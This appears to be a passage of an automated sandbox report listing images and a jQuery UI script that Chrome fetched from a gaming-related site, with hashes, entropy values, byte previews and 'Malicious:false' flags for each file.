                                                      SHA-512:9149B9E16B06D6508EBEBBF78A59AD26EB15FF35084C2BB6BE8F08795884F4A914E24689FC2402EAAE46819EFDDC37281B7D778C92D2BF66F8939A4FF9F02A86
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images/dc_new.gif?ver=1606790076
                                                      Preview:GIF89a...............................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:EDCB7121599E11E889018115615FE670" xmpMM:DocumentID="xmp.did:EDCB7122599E11E889018115615FE670"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EDCB711F599E11E889018115615FE670" stRef:documentID="xmp.did:EDCB7120599E11E889018115615FE670"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..................................................................................................................................~}|{zyxwvutsrqpo
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):21644
                                                      Entropy (8bit):7.975441144938051
                                                      Encrypted:false
                                                      SSDEEP:384:Sz/eF8MsDcpudjYpSfyO85XHHlWyDOBzin5CCAnKL4yc4RRpBUWB+57hUZhaoxL7:vY8SGb5vAnzUpBUWB+57eZhFxLFNP3FN
                                                      MD5:FA78E1FFFA0930D59DFE369D298E08B9
                                                      SHA1:9A84E94C6725BE3A8DDEDFB4623CD04B645D04B4
                                                      SHA-256:1E19C0E8CACE8198EDFFE49CE49F5813661093ED4C95DFC9C03315EAD82585A5
                                                      SHA-512:209593EBC3D6DCE37F3958DB04DAA062957AC0712DDEBB72CB80374F336B932404DF8AF1F020A47A3F07C6583EA4A95534DD8CCA7E6236C25CE2007BADBD5FFA
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE.....A.....;..0..5.....*..6.....;..@..%..F..J.0xO....%..Q."M.-s.6}.'V.=..)b.*l. [....C..........ILO..1.J..7\.......(F..-....<s]bc..!.Bf.FJdkm._b.NS.gh......2j./Pa. /..QWZ.......Q.>...W\...osw.Z.....(.Z....../7...@..}..2......Ot.~..l..B.....=Bv2..tu.Cz>....".$y......]..$..p....6....j....+....P.....-~...478......L.!.T.._....F.......6s..E.=..Meh..'.aGB....y..D#...0.K.....+b.T.+...+uT..Pt77....W.7..,...../>W/....t.!'KD......)s.$..."-q.......:.3U............."Y..kI...`.,h.a....cY;5......o.=.W.l.17\B<A.).0..Uw..x.......2...\.b.[.........(Hv...yt.K;..d..K.C...q..,..Aj&..._e.I]...r.q..i..0j.,.u....?..(t.|YW.CK,ez.(C]...kt.cw.c..;._QNV...hbp`+.....\).$..8....~8.>#...J....O.....Rz..@...tB.+1U#~........o....qH{.w.@..e....x...2y.x...PT..Y.Q#^.fql.z...j...QGIDATx.t.n.@..p..P%.-9>.X.< ...D..5.U..ElU.(C..x.J..........[. |....E.Kb.......K..;.$K.$...".8..>N..H.uWW.......>~|..f.M]..I..$.......%....d....GP...>..<...).`,.1...../_.....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 280x200, components 3
                                                      Category:downloaded
                                                      Size (bytes):28872
                                                      Entropy (8bit):7.97689892885406
                                                      Encrypted:false
                                                      SSDEEP:384:R8mvRXApP4Bha1aoq9yq42F7eb51sROx4pJTwsrcLCYsMvnQosNofay:K+RiSk11Gyq42I7sYOT01/vQosFy
                                                      MD5:E902CB28E92D9E90B4A622097D1430BC
                                                      SHA1:575E64AD1692AFFE700076D96134F35A6D918E43
                                                      SHA-256:FC0FC5CF76E65E63B085169798410C495C5F8981655588DFFA5F98384F33AD22
                                                      SHA-512:321A2C0381D1998403B8C035A34C31A69EC1E323479F404C835E5110092A5507E07FB1928C0E5A701CA0B8AC0EB515C3DD025CABA40A31ABD2D0E1E87AAA5241
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/images_plus/other/en/right1.jpg
                                                      Preview:......JFIF.............C....................................................................C..................................................................................................................................................................I.......zbpF..........c..f.n...@.C..j...................-WF...U:.P.oe..\..q.......-.7Z."u9,....,..7^/.....^..q...........6....../U'#..^-`..*.;......Pgd. ../..D.......\........FW..:..<8X.I..qH=.Yw..g.V2........m...E..2..S.3RJ.w....r....$.e.q.t.N..<.?g..|.._..C+.N..:U._vk&...$.R.T2H.#...$.......-...z..?........?.@.v.W.2Y;k.g...zt.'FE....i3....K^...Y...)#..#-.....gKD.s.7...........0..3.&.U2e9wy.....@.g;...K.O.nls..V.......Z.H..Z..J...Y.. ...Y...rt)5R1.E./.W-.Q.6.&.......(..U.L....O&r.\.|.V.....f8......7.S....`....j7..I...J.z'$+...^U<t.j...i.A[u....=...+Z......8}.I..j.....+%.QK.r..o...1...H.Ro..l...NC....3.s........J...#...'..b.}......V.d9.....l....|.\....e\.g..u..x.......\......2.WW.JE......K......P..L.Z*"T.m.P.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 271x81, components 3
                                                      Category:downloaded
                                                      Size (bytes):10687
                                                      Entropy (8bit):7.941103878605605
                                                      Encrypted:false
                                                      SSDEEP:192:/82vfqsMWCRvaAD3/mt5AocLT+nTOFlJH6IPsSmIYl:/823dMWYr4KocL6kPsSPM
                                                      MD5:EC1232FA10FAA81CDC043FDE398FE8C5
                                                      SHA1:6C777C1653D117802F67B501DAFA08CB8DC03609
                                                      SHA-256:B17264CCD66167D7844F3EEF951F98A95088F867E059EE80AED79AC64104C18B
                                                      SHA-512:A9FECBB6BF5FE0CE811295B0A25F5C87CD7376A742AC3157EF6CF33AD4E96D87B01B7B8D846E7BCC352379873E373143E325EDF847AD4EC422701F8EEB261268
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/index/g04.jpg?ver=1606793375
                                                      Preview:......JFIF.............C........................................................ "..".......C.......................................................................Q......................................................................................?.a...P......I.$v@.....:...hx.a.KI2..,I....l......P2......[....)Y..#....m.U.....~...ek.6..&wz...6..h...5&R9Tx.$....&...Y......B.:$jW.h...d_g.~H..J.!.)...}..5."./.{.~...........*77....T..z...F.....!.Re@r%,...4.A...n.G...7.~o'....{,....|.=.W.........z.:_.}.^..s....]....UFg....Es..k.%.>%A.?.w....w.Gi..T0[.:.......b..~.7..K<.M58...F...K].x..a..#.z[..HO...J..)...E..".a.{N...5..w.fM.n..j....]...-.v.zf..l...:)gQx.....w..l......a..XrT.al....9.e....a.a.=...R.6....-E..\W.t.HO..'d..3..*....W........'...9...kHYk..0.HEz..H..C.eX.>.{O.....y.lp..u.5{)....;..+....7.7T.yK.;{.[,...[e'D.V.Fpb.<.Y.X..D.CW.G.U...i....7....;.....e.4h}.D..wy.k.*..J.......}>nc;..[$.r...qJ.<C$m.Y...$.Kb!1...:..0..YPU..`...28....=.....%..5F..f...<)U...R....2..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):18910
                                                      Entropy (8bit):7.973930554341829
                                                      Encrypted:false
                                                      SSDEEP:384:uwLrhpeCl2qUJuCdLETHK2crBhyWBZam3X2Sl51IgOq:uwB3NUVQTqu+Z/hloy
                                                      MD5:B490D8B73205C65BCFBEF34C57F7B9E4
                                                      SHA1:E8E699AB89FCE1E4024E55B024EB46CB72CBB92B
                                                      SHA-256:0A49CA859E6BD8EC77C670E5CB0992699F8997635068958285B4E47869CE6428
                                                      SHA-512:1F412D1B6486853BC62032E81C68AB687196D05C950E114BAC6552E224F433916AAD2074B0E7E1E40AB8B398F21EE9F28849241CD44C91D5E07D39031FCF5F64
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE..-..3..9..<..?..E..J..Q..V..V..T..M*.Y5.a8.l?.oJ.sS"x`'.s0..B..T..`..y....~R...............C..Z".O..d0.vD.F"......%#...|E.q9.]..v..L..L.C.;....~,.q%.\"...,.-.$.+. .6..I..V..h..u................................y.o.].S.G.>.8.~3.s..j*.t!.i .b'._&.]".U..L.y?.f2.l9..I..T!tH.iD.`;.Z2.P..F(.<!.3..*.. ..............$..,..1..6..?.......'..-.....s..j).t+.9.g(..FZ'.L..aRJx`H..k.....a3..k.......Y.x..`uR,4...nK]=2P-0D#"..E2.-..c#.o*.}/..G..`...*..........t..^.w.K}y?.[%.s....{..]q.V`.RO.N@.H3.A'.@..=..<..4..&..)...Q..G.IDATx...S.....T\.......#v.].8.v..gZ.T....&.(.Lg...g&>;....$.d.K..SHZ..a..y.w_.@;..........9.(..n...4B.)=%..h ...N......lm5.....S,...........Q>O.E..k$...T*.y..gL.o6.|.}.ys../..J9.....x.+.=.T.......J.u.a...9.#.....(...08GC.`.|u:F&...U....:. a..5.......g.#[.*..6.Ar.;.0t.,..h.t....n7x.U. ..9.J.D.S)...,..#.h....v@.y.Cp...C..v._'0.G.&q.N.h:kj.Z:rAta.)a.(.....OCU.,..<.J.;..|.W... .n.L...A...Qe..*...v.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 80 x 15, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):944
                                                      Entropy (8bit):7.261909973916971
                                                      Encrypted:false
                                                      SSDEEP:24:R6atw9AHyvVSBn5CaJzBaW2uyu+Qqo5hX844wN:wQw90yvVSh5tzT6u+D+XAwN
                                                      MD5:4877463A72742C21C36F198ABAA72496
                                                      SHA1:B6286B50E4C7F1B551EA5D038AFB40A6905CBA6B
                                                      SHA-256:10D9F5A229D90B3553C14A9C48B3B94E927257AA6CD252EE7D4C12FDAB6E0757
                                                      SHA-512:8F770782F78FA54F42CF3FB82353525BA56494347D6D6730BE29132CD7DD97105C61BAD8D662FEA59749248B98039F731E57B0CEF4BA09E0925D7D8A29276589
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...P.........D.......gAMA......a.....sRGB.........PLTE.........................................................................................2..&...zj..*0&.gY.......k\..y.../..2..(....*VI......1..1.....(.,.,TG.........%eV.-$...!.z.......F;...0.+.....!.. .o.....z..{..v..r........".....#.....$..!..%.......%......)..!..&../.....2..n....\tRNS..`0....@.p...P ...........$...r.<b.%f.... .U.......R+(.$.....J.....t...Om../.......-..M...'.f....IDAT8...r.0.E..]9^.t...{.8.N.....F..........p...I,.\[..9.../.M.....<.tweq8k. ...x.8...R...FCx..b...T&..F....&`9zlc..Q.i....h`g...v.?w...m0.7.+...@]{....R5..P&.$....o.]%v.J...Y."....4!..#..A..:q/z.4$....xxa...JD...9.....GBZ..N..="P^._..c.7.;9...3Q..X}...v..;..n..l9....H.H@..]!*...#......].x...j.2)-....~.(M&`E*[.D.Ic..&.;..S...'...i.q.A@.1.v...s.=.5.2..#..l.S.`<.[.*....^...5....)T.G.[%.........].H......A.!.@.}....p...M.3<.....s......}....t.R..#;.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 24 x 434, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2699
                                                      Entropy (8bit):7.568695421620088
                                                      Encrypted:false
                                                      SSDEEP:48:s8f4QkSQSKoQxkN+CNojwIQkkSxxWVh6pL2XH4Ys3qq5LzKmzEIUMOya4+CPvfS8:s8f4GBKol+eozxWVcuYYs315LzKIE3o7
                                                      MD5:2C79E8F412CC8DEAEA0FFCE4A86766CE
                                                      SHA1:DF14E8F8DFBA6027785DB5C067C43A034D07D2EA
                                                      SHA-256:6DAF808190B6CFB43E7A864A8C1F368796955716E06FFD2D42CCCB61751860D2
                                                      SHA-512:F43D7868F07B81295BE1668D2DA029C73665886C0E91DB5789EAC3AFAAE0FAF96930FDE60D71D78B54F3BA6DACD0F5BBAC4AD4572AEBF456B496B3F126D79BCA
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............Y.....>PLTE......\\\\\\\\\...\\\\\\...\\\...\\\...\\\\\\\\\\\\\\\\\\\\\\\\...\\\...\\\\\\\\\\\\...............\\\\\\.........\\\\\\...\\\............\\\...\\\......\\\\\\...\\\\\\\\\...\\\......\\\\\\.........\\\\\\......\\\...............\\\.....................\\\\\\...\\\...\\\...\\\.....................\\\............\\\.........htRNS..............O@../....`.G.....p.....f.`M44...~..jj....^]UF0...9..roe'...V@&".uR7-#.{w..hI=;.OC..T.r....IDATh..XK.0..1(".......n..b...,t.eK)].&...L.&3..a..|z..In.#....;0...z..#.8}.|ha..gJ..K...\..+.R.#.e.%xeM.z........`S...........I.....H.Q...z..P...G=.DHv..s.J.6a..q.........w.....Gt..hp...$~|......#.'.1....N<B.....sT\..%.g..$...J=z..Q.$X<ottD.L..h.....Z....z.^..V.@......1..I.`......6..\ ..#..|.@P<B....B,.`.Q...*.[M8p.d.e.k../?..Ql-....'..*.|..hx.[.r.....>..5...Q>....>q....$u.M.ay.<.Yv.T..hY...~..9..l...|... 3.QA6.'..0A..W..+..,.f...g....9.^;....Z....)iU|........x...#..H.(..3S.\e......:.3...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):18910
                                                      Entropy (8bit):7.973930554341829
                                                      Encrypted:false
                                                      SSDEEP:384:uwLrhpeCl2qUJuCdLETHK2crBhyWBZam3X2Sl51IgOq:uwB3NUVQTqu+Z/hloy
                                                      MD5:B490D8B73205C65BCFBEF34C57F7B9E4
                                                      SHA1:E8E699AB89FCE1E4024E55B024EB46CB72CBB92B
                                                      SHA-256:0A49CA859E6BD8EC77C670E5CB0992699F8997635068958285B4E47869CE6428
                                                      SHA-512:1F412D1B6486853BC62032E81C68AB687196D05C950E114BAC6552E224F433916AAD2074B0E7E1E40AB8B398F21EE9F28849241CD44C91D5E07D39031FCF5F64
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_majesticDragons.png?ver=1712128601
                                                      Preview:.PNG........IHDR...............^.....PLTE..-..3..9..<..?..E..J..Q..V..V..T..M*.Y5.a8.l?.oJ.sS"x`'.s0..B..T..`..y....~R...............C..Z".O..d0.vD.F"......%#...|E.q9.]..v..L..L.C.;....~,.q%.\"...,.-.$.+. .6..I..V..h..u................................y.o.].S.G.>.8.~3.s..j*.t!.i .b'._&.]".U..L.y?.f2.l9..I..T!tH.iD.`;.Z2.P..F(.<!.3..*.. ..............$..,..1..6..?.......'..-.....s..j).t+.9.g(..FZ'.L..aRJx`H..k.....a3..k.......Y.x..`uR,4...nK]=2P-0D#"..E2.-..c#.o*.}/..G..`...*..........t..^.w.K}y?.[%.s....{..]q.V`.RO.N@.H3.A'.@..=..<..4..&..)...Q..G.IDATx...S.....T\.......#v.].8.v..gZ.T....&.(.Lg...g&>;....$.d.K..SHZ..a..y.w_.@;..........9.(..n...4B.)=%..h ...N......lm5.....S,...........Q>O.E..k$...T*.y..gL.o6.|.}.ys../..J9.....x.+.=.T.......J.u.a...9.#.....(...08GC.`.|u:F&...U....:. a..5.......g.#[.*..6.Ar.;.0t.,..h.t....n7x.U. ..9.J.D.S)...,..#.h....v@.y.Cp...C..v._'0.G.&q.N.h:kj.Z:rAta.)a.(.....OCU.,..<.J.;..|.W... .n.L...A...Qe..*...v.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):29058
                                                      Entropy (8bit):7.989319602779076
                                                      Encrypted:false
                                                      SSDEEP:768:B7wGxIYk9A0PTpFQgewOsVxJ9b+td8qTjx4:9Ih2WvQgqch+td8wjx4
                                                      MD5:DB30E17BDBD4142262084F3F303F08F2
                                                      SHA1:A6840F260567DCC3EBEF1010747DB7EEA56BEEA8
                                                      SHA-256:E94EB172E1E6F1088C446CC15C1E02CC59A367CDA246FDF4B474B08120F71BD9
                                                      SHA-512:5821E659F453616C67C8CC64182D3A8BF418BF3044BAEDFEA92BC9210553E904CCCE3BFDC75C36549A4A5E99F55DAB844A9F1AC5F3AF8190F326D51AD01DD1A7
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/mur8wje4dccb1.png?ver=1673334590
                                                      Preview:.PNG........IHDR...............^.....PLTE1..(l.&].5..'O....E..+..;..n7.)..N .[$...CT!.......+.... ...c).c0...".Q.b..{6.%-;y?...9.....H......(w..",H"#o2.u..5.)4..%..>........,.?.....J.....e..X...\.....2......w........?.t .D..1...R.:..Uw@U.7'..d+...R.-...T..d....0.....,!g..+.g...3.i.pO........p.*=Ne(A....z .....h.w[[)(..H&.}..O....k.\.B={..w.Vjr<7.2......b9P..En/&......N}............;..9.....I;SA2P........Nh.....dw..Q3Kcv1.[V..C._n..-.X@..Q.z.k'....vV.....T.`I.AGA.C......NA...mO.u6SNZ.s.b6......L.u..^'y...[J.y?..h.uW....-(....4.v...ZQ?....]._-.kL.gkY@.e..........vO....[B8E......@[z.v.[x.nYe.{...nv}.}...q....x.k.{d.Y\.WlIL...O.C.Q...8~..x."..G.................2.M.......#(.}a.>y._lf..*...f....n.........b@....Up..r.......?.....G[.$7..c....m.}t.....w....&@.._.>..."......tRNS.....St.@..n,IDATx.....@.......X(.a.)..A,..@@...`#..+.# 6.r.W.E.....^........Zf..!`c...7./..w.G&..}.7.^r...tJd j.$I....Jv:5..&.?.f"#.NP..x......OT......P......4K.,C.......D5BI
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2481
                                                      Entropy (8bit):7.679234057450698
                                                      Encrypted:false
                                                      SSDEEP:48:JmS1/L2huC26xf9mqK9vI3Vw2m0/35Ml7jt4RbIVk5u8KvcxT5:JmS12f79m59B2m0/3443Dv
                                                      MD5:758348CB76128EABB6D3148CBD2C82F0
                                                      SHA1:AAE6C2E42E0E7785761F81915615BFDF94760727
                                                      SHA-256:278FAF92A2576C7A24865EAEB06A67EDBFA1BD20C1FB506FAF62771DDA176F72
                                                      SHA-512:33A3497856DBEE7A8ED122C74991427A3FE1B160136A7B54C125070D50A6019F4A450D4EA274AB9BF587930E1FE9F97EDA0A5666FE9A5B07A0B8052274002D5D
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......PLTE............................................................................................................................................................................M....-tRNS...@.`...0.... ..:.pP.....u...?h......,.n..... ....IDATx...]..0.E..F.A.0...w....lh..F.Y......................................?l...4...1.&...}......f|...dRC.ej.=Dk/.K6..U....L.F_f.waj.}4...T..,.Ge.TL#...|...0.M...[..2L2../...CQ...x.a|W..R....{..$u?....G?...s}.1..'C......i..=.)..C*=l....Oa.b.8..2.....0.2....0.2....0Un.._.c9.a..9...A0.?@......v^.f.:7..'..V.. .....k...O....!m..}.g.S^\.".t..B.............*%FQ9.D.pWX.......dKr..i'u....r...(...x)..ib...z.%F.J{@./..N{....#.=.F..p9!y....l.....$qb:...T....$*:U.mR..K.bD....Q..W..W{.r...K.b:.c`"N..:.^.. CgU.0.."..H...C...iP.....(*P....J.C'...N@...{.t u4.,N...)Hp.f.8.u....y.L.N/.1b...7..W:.D.b..r/....o.\.Dj1..0.:.......%....x)d..w..R....r..u!3.&..t....s....`..n1..<Y......=^/5.1..C..3....q..(....B....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):20885
                                                      Entropy (8bit):7.9628685702568385
                                                      Encrypted:false
                                                      SSDEEP:384:yCLHZ5VtCMuhtM7xj1OcQZPaJbsMgpUPgz0+U0uvt+pe96WIxj21QTKmqMYanvB:/tLwvP6iQJbBYz0R1F+mIxjQM
                                                      MD5:5422D53213A429DFFDC7534DA8DBDB41
                                                      SHA1:1C020DE2F4CEBA15D2601E73CA70C33871976F61
                                                      SHA-256:64ED64AA905377B09D669089EE9559CF1219A42A0398A2AC5B5A328BC9AEE403
                                                      SHA-512:338C472700A75D5B08A720295743855E35A607C446EEE24FC33C34A3E9FA32C56241107F2E5842AB5ED3F746D9AEA8DEF5DF48F61E2B523E4BC1AE7CE4F6E0FC
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_stumpyMcDoodles.png?ver=1712128601
                                                      Preview:.PNG........IHDR...............^.....PLTE..<..?..E..H..K..P..T..V..V..d&.u/..S...........o....9_+_aLSnjYVK8..............D.{..C.r5.^(.E..0....E]Rm.{p.....t.............................|.._.F..Y!.c+.g8.x?.=#.;D.z..eu.Cp.8..G..C.........:.6.x............................q..e..V..q.....m..9.....9r.#_.(5.94.QF.uf..u.c.p]._O.UH.K?.....|.dn..y...h..i..[.hO.iy...............g..L../..`..p........c.].r..].[..) '?39F#4(.O"7i,5.-7.B;.Eq.E}.i..v.v..d..p..#..7..B.ZE.'%......p..N..............9..M".]+.r3..@..I..V..Z..~........!..U..D.D..1.?..:..:p....1...i.+N.1.]..m....0..=..M..M..9..&.......X..&\..s.L..|.....y..q..[.xX.gQtXEgB7M74=&')..A1.R:.`E.mN xX%._*.k0.p7.~8..I..N.Y.b.j..s..|..z..f..l?S.Zj.MYm:F_0/\!.R..L&.Y1.`9.j@.pM.tZ&}i7..A...uo.US.R:.Q4.A..>..4..&..(..+../..3..8.@.^..NPIDATx..}..Wy...{w....^..$.cl7.M.$&|)....@.T.!.W......(.....DP>..P.h......B.Q .$.S...I.8.V...f.ql.].;...9:..H}.h....h~z..}...J.e.`a..Fe.).t{ w.g..P..l#?..,d...e... .Z.3..B.....D
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):24003
                                                      Entropy (8bit):7.9828261784648324
                                                      Encrypted:false
                                                      SSDEEP:384:uWRXopvzA2HSlbWsHubrfXhXoC0lAzfqgWoeveEci33lgLqXI9WpIbl5iLgYLt21:ZRXALR2ybzK0diXHlg24kpkviEZ/JpV
                                                      MD5:575466064E01E777D61674EE695DFBAD
                                                      SHA1:F84BAAA2EDF3139CDA4656C2B843392A402F239D
                                                      SHA-256:7179337CF4F70FB0DDAFC83526F70A234DF6FE3E213F574F866B89F7D8D6ABED
                                                      SHA-512:7559A45EEBD319BEC7450386F79210106AD0AA24C204092AD40D8465F912CB5673AC2A75A7D8E7683768A54C96DA8D685A22E215E18CD6AD16E323ADAD4362F7
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/z7k6mqf3z495a.png?ver=1673334591
                                                      Preview:.PNG........IHDR...............^.....PLTE.....".!6..2.......2J.....(.%9.5N./G.,D.8Q...HHH.&=LLL.*A.:XQQQ...TVWZZZ+*(432@?>DDC`a`777....K.//.pqp...;<;www.R.....O)N......N.. %-+F#$#._.....AaoH .<....hhg.39.+/54Ni,..........mL.......Gj.Y&......%.6....mw.AU@...al.dD.%.a>....X.....7............Ua{9.......\7.y.E]k.h,.H.#...W;...}R$.8>|.....]|~uQ..<C._.Q2..k.....6......g......>Ue.GL.f..;..xA.......g@..\..NV......_..zD.;MZ.o.'lr*.....Tcg.{Y.}.....PY!.>....t..g..q..Pv.f,...p0...[ksh...."...l9&.]..;D>qz...#^d.z9.....$9CI...........]..M..M....@r..+CR..;l...v..|h6.5.......~.w........+.....<...CUD*....[..D..h..E.....QD...<m...f..4.....Q...2......fX)....'.....p.F.........S........wn....W.m...%.......`u.R.....X~hOa\<............cQ..@......v...f.......dS0..s...H.|...NF........+).....b....Z~IDATx...oH.a....[o..W...4....M...YD..jA..]mCj...V.....@_T.i...7.?"........./..E.../.=...\[A}...1....s.T..z....p.T0H.U.=.lT.@8\.b.9.lv9.@ .*p.B*.. K4.........U.zlA...2.......\HV
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (32074)
                                                      Category:downloaded
                                                      Size (bytes):253669
                                                      Entropy (8bit):5.142891188767758
                                                      Encrypted:false
                                                      SSDEEP:3072:FkHOJD1g7SV7opRBbDrtnAcKYvFJi/5PLO1aG0qF2/nwOW16j:q9/KvjOVlFYQ16j
                                                      MD5:C15B1008DEC3C8967EA657A7BB4BAAEC
                                                      SHA1:78489E580ADAEF931E6E5B131DAB556C397E4A1A
                                                      SHA-256:28CE75D953678C4942DF47A11707A15E3C756021CF89090E3E6AA7AD6B6971C3
                                                      SHA-512:BADA3D9A5433AECE7D57020B70B89161E2CA3CF6D2FDB4FBD5D6BF38405813071D35493C8D8232F83D7BE91628A29D436BE7FD9AF918AE68F93022D9584B50B8
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plugins/jquery-ui/jquery-ui.min.js?ver=1606790105
                                                      Preview:/*! jQuery UI - v1.12.1 - 2016-09-14.* http://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sortabl
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):4690
                                                      Entropy (8bit):7.805157800626379
                                                      Encrypted:false
                                                      SSDEEP:96:WYrfm0AhWPx3/qs4dp/Jch92YNFaDFfEiUlcffXLcC55i7xCXP52K:WeEg/qnrGv7uAcnbcC5aCB2K
                                                      MD5:4223F6C99139CC63EBF5FEDC473EFED2
                                                      SHA1:C5EAE4D521384CA3DFC1D071C20B4CBC51822624
                                                      SHA-256:DC4B7B0A3C7E57CA27EEF8C44A93CDFC7B3C8BB4F409C0D94BED52E642F21044
                                                      SHA-512:E89576E34A263A2DF9E5322FEF31EDE619617E144AA5816090AB0558CC8F24835A21A61CC8F4B14A6ADFE2D965237D7B0C9E7EBB7720DE19D6BF133C154ECF69
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......gAMA......a.....sRGB.........PLTE...OOOc..OOOOOOd..c..v4.@q...qOOOOOOPK\....t..OOO....OOOOOO...OOO..OOOOOOOOOOOOOOO..xOOOOOO..OOOOOO....OOOOOO..........OOOOOOm#.OOO..........k..OOO..............z....c..OOOOOOOOOr-.OOOu3.u2................xc..OOOc..u2.o'.OOOv3.t0...u1.........z..xc..v4.v4.v4...yu2.....vv4.c..c..c..u3.v4...s..Ai_..c.....v4.OOOt0.d..r,.j..l .n#.h..p'.f..u1.s/.s..u2.u3.s-.c..e..k..k..j..l..m!.q+.m".q*.q).i..i..p(.h..g..o%.g..g..o&.e..n$.e...I.....l.........l....{..................X...t.....n......p..q..r........<....................N.......w.............c.........}8.........]........V..x.......f.......`....u).....[.....j.................|..u....n .....@..D..q..p......w,.m..i.....y5.p$.u.....s*.y1.q&.r$...w1.t,.G8.....ptRNS...}...Q..`0....q.".?....O.H.$.....E....T.B.i.U_.l5vG.....R...-.\.$=.......*.t.8(.......N..h.....[_\.....y..9...tIDATx..w\.W...#.[.....,((rvMl
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):19894
                                                      Entropy (8bit):7.970339179426739
                                                      Encrypted:false
                                                      SSDEEP:384:eXuYHCD/+ENhz9lNu+NHKxFleJqSvbJTybgmlxJns+fy+2NYDVfpDwuQc5zgpVw9:eXuYHooy8SqkJ+Ps+f8NipDw4BOw9
                                                      MD5:D2A8CA7D7E03AE80E5564E8EB48E9E44
                                                      SHA1:DDBDE36FEBF992EFECB43F4A7F961AAF4DBA4664
                                                      SHA-256:CCD55101EBE703461BF3D694951A31A869C30FB6727E79663D871AEC96851D8E
                                                      SHA-512:8AE2CF08CD12E2B1B019772C1AA334452B0846097DE2AFF1C6EEDA859031A5E8AF0AEB0C65845469EFACB215C5C5B512D7994E39B36E090569F91E57ACD2CC96
